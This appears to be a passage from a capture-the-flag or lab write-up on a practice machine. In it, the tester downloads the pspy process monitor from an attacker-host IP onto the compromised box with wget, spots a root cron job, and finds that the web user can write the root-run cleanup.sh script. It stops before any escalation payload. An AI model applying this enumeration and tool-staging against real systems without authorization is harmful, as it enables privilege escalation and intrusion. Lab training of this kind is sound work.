PSPY
A root cronjob process was identified
www-data@law:/dev/shm$ wget -q http://192.168.45.203/pspy64 ; chmod 755 ./pspy64Delivery complete
www-data@law:/dev/shm$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
doneExecuting PSPY
/Practice/law/4-Post_Enumeration/attachments/{C42FA322-E2FB-40AA-9444-BEF47CFF77B5}.png)
The root cronjob process is executing /bin/bash /var/www/cleanup.sh
cleanup.sh
www-data@law:/var/www$ ll
total 20K
4.0K drwxr-xr-x 2 www-data www-data 4.0K Feb 24 07:39 html
4.0K -rw-r--r-- 1 www-data www-data 33 Feb 24 06:34 local.txt
4.0K drwxr-xr-x 3 root root 4.0K Aug 25 2023 .
4.0K -rwxr-xr-x 1 www-data www-data 82 Aug 25 2023 cleanup.sh
4.0K drwxr-xr-x 12 root root 4.0K Aug 24 2023 ..
www-data@law:/var/www$ cat cleanup.sh
#!/bin/bash
rm -rf /var/log/apache2/error.log
rm -rf /var/log/apache2/access.logThe current user, www-data, has the complete control over the /var/www/cleanup.sh file, which gets executed by the root account periodically.
Moving on to Privilege Escalation phase